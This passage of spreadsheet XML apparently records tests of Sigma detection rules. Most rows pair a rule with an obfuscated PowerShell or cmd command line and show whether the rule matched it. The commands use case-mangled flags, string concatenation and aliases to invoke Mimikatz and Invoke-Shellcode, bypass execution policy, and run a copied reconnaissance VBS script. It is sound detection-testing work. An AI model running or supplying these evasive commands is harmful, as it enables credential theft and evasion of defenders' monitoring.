      <c r="C765" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D765" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E765" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F765" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G765" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H765" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K765" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="766" ht="15.75" customHeight="1" s="42">
      <c r="A766" s="36" t="n"/>
      <c r="B766" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C766" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D766" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E766" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F766" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G766" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H766" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K766" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="767" ht="15.75" customHeight="1" s="42">
      <c r="A767" s="36" t="n"/>
      <c r="B767" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C767" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D767" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E767" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F767" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G767" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H767" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K767" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="768" ht="15.75" customHeight="1" s="42">
      <c r="A768" s="36" t="n"/>
      <c r="B768" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C768" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D768" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E768" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F768" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G768" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H768" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K768" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="769" ht="15.75" customHeight="1" s="42">
      <c r="A769" s="43" t="n"/>
      <c r="B769" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C769" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D769" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E769" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F769" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G769" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H769" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K769" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="770" ht="15.75" customHeight="1" s="42">
      <c r="A770" s="43" t="n"/>
      <c r="B770" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C770" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D770" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E770" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F770" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G770" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H770" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K770" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="771" ht="15.75" customHeight="1" s="42">
      <c r="A771" s="36" t="n"/>
      <c r="B771" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C771" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D771" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E771" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F771" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G771" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H771" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K771" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="772" ht="15.75" customHeight="1" s="42">
      <c r="A772" s="36" t="n"/>
      <c r="B772" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C772" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D772" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E772" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F772" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G772" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H772" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K772" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="773" ht="15.75" customHeight="1" s="42">
      <c r="A773" s="36" t="n"/>
      <c r="B773" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C773" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D773" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E773" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F773" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G773" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H773" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K773" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="774" ht="15.75" customHeight="1" s="42">
      <c r="A774" s="36" t="n"/>
      <c r="B774" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C774" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D774" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E774" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F774" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G774" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H774" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K774" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="775" ht="15.75" customHeight="1" s="42">
      <c r="A775" s="36" t="n"/>
      <c r="B775" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C775" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D775" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E775" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F775" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G775" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H775" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K775" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="776" ht="15.75" customHeight="1" s="42">
      <c r="A776" s="36" t="n"/>
      <c r="B776" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C776" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D776" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E776" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F776" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G776" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H776" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K776" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="777" ht="15.75" customHeight="1" s="42">
      <c r="A777" s="36" t="n"/>
      <c r="B777" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C777" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D777" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E777" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F777" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G777" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H777" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K777" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="778" ht="15.75" customHeight="1" s="42">
      <c r="A778" s="36" t="n"/>
      <c r="B778" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C778" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D778" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E778" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F778" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G778" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H778" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77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778" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K778" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="779" ht="15.75" customHeight="1" s="42">
      <c r="A779" s="36" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B779" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C779" s="36" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D779" s="36" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E779" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F779" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G779" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H779" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I779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779" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K779" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="780" ht="15.75" customHeight="1" s="42">
      <c r="A780" s="36" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B780" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C780" s="36" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D780" s="36" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E780" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F780" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G780" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H780" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I780" s="36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780" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K780" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="781" ht="15.75" customHeight="1" s="42">
      <c r="A781" s="36" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B781" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C781" s="36" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D781" s="36" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E781" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F781" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G781" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H781" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I781" s="36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781" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K781" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="782" ht="15.75" customHeight="1" s="42">
      <c r="A782" s="36" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B782" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C782" s="36" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D782" s="36" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E782" s="36" t="inlineStr">
        <is>
          <t>cscript.exe C:\Windows\System32\GATHER~1.VBS</t>
        </is>
      </c>
      <c r="F782" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G782" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H782" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I782" s="36" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J782" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K782" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="783" ht="15.75" customHeight="1" s="42">
      <c r="A783" s="36" t="n"/>
      <c r="B783" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C783" s="36" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D783" s="36" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E783" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F783" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G783" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H783" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I783" s="4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783" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K783" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="784" ht="15.75" customHeight="1" s="42">
      <c r="A784" s="36" t="n"/>
      <c r="B784" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C784" s="36" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D784" s="36" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E784" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F784" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G784" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H784" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I784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784" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K784" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="785" ht="15.75" customHeight="1" s="42">
      <c r="A785" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B785" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C785" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D785" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E785" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I785" s="43" t="n"/>
      <c r="J785" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K785" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="786" ht="15.75" customHeight="1" s="42">
      <c r="A786" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B786" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C786" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D786" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E786" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I786" s="43" t="n"/>
      <c r="J786" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K786" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="787" ht="15.75" customHeight="1" s="42">
      <c r="A787" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B787" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C787" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D787" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E787" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I787" s="43" t="n"/>
      <c r="J787" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K787" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="788" ht="15.75" customHeight="1" s="42">
      <c r="A788" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B788" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C788" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D788" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E788" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F788" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G788" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H788" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I78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88" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K788" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="789" ht="15.75" customHeight="1" s="42">
      <c r="A789" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B789" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C789" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D789" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E789" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F789" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G789" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H789" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I78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89" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K789" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="790" ht="15.75" customHeight="1" s="42">
      <c r="A790" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B790" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C790" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D790" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E790" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F790" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G790" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H790" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79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90" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K790" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="791" ht="15.75" customHeight="1" s="42">
      <c r="A791" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B791" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C791" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D791" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E791" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F791" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G791" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H791" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79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91" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K791" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="15.75" customHeight="1" s="42">
      <c r="A792" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B792" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C792" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D792" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E792" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F792" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G792" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H792" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79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792" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K792" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="15.75" customHeight="1" s="42">
      <c r="A793" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B793" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C793" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D793" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E793" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F793" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G793" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H793" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79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93" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K793" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="794" ht="15.75" customHeight="1" s="42">
      <c r="A794" s="36" t="inlineStr">
